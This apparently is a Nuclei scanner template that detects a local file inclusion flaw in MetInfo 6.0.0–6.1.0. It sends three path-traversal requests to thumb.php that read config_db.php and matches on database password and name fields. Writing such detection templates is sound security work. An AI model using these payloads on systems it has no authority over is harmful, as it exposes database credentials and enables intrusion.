id: metinfo-lfi

info:
  name: MetInfo <=6.1.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
  reference:
    - https://paper.seebug.org/676/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: metinfo,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
      - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "con_db_pass"
          - "con_db_name"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022017c46e7d49eb19f63f1af6b96959e670e279edbd383ac63fb07e931bbe19ded6022100f8db56cad71159ef59fa4c8f509b75d0262308339bd992edec9338a8fad8f5f0:922c64590222798bb761d5b6d8e72950
